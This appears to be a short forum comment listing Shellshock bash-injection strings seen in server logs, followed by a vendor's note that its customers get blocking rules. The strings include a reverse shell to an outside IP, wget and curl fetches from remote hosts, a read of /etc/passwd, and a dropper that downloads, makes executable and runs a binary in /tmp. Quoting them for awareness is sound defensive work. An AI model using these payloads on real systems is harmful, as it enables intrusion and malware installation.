I'm just waiting on Delayed Job at this point :)
() { :;}; /bin/ping -c 1 198.x.x.x
() { :;}; echo shellshock-scan > /dev/udp/example.com/1234
() { ignored;};/bin/bash -i >& /dev/tcp/104.x.x.x/80 0>&1
() { test;};/usr/bin/wget http://example.com/music/file.mp3 -O ~/cgi-bin/file.mp3
() { :; }; /usr/bin/curl -A xxxx http://112.x.x.x:8011
() { :; }; /usr/bin/wget http://115.x.x.x/api/file.txt
() { :;}; echo Content-type:text/plain;echo;/bin/cat /etc/passwd
() { :; }; /bin/bash -c "if [ $(/bin/uname -m | /bin/grep 64) ]; then /usr/bin/wget 82.x.x.x:1234/v64 -O /tmp/.osock; else /usr/bin/wget 82.x.x.x:1234/v -O /tmp/.osock; fi; /bin/chmod 777 /tmp/.osock; /tmp/.osock &
If you are one of our (paying) customers the rules to block this exploit are enabled automatically.https://www.google.ca/search?q=site%3Ahttp%3A%2F%2Fwww.googl...